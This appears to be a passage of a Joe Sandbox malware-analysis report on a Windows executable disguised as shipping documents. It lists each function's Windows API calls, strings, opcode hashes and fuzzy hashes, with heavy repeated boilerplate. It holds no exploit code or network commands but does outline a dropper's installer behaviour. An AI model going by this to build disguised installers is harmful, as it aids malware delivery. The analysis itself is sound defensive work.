Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$PointerWrite
String ID: x>A
API String ID: 539440098-3854404225
Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23

Strings

Call, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9

Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B88, 00405B8C
nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00403345

Strings

1033, xrefs: 0040334C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403325, 0040332A, 00403330, 0040333C, 00403344, 0040334B

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2030658151
Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
Instruction ID: 49947657582026fbe4aef0e17b19bc3bf563a4cedc03dc09487ed5c70e3121f8
Opcode Fuzzy Hash: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
Instruction Fuzzy Hash: B521C871904215F6CF206F95CE48A9E7AB0AB09354F70427BF610B51E0D7B94D41DA6E

Function 00401B22 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401B92
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4

Strings

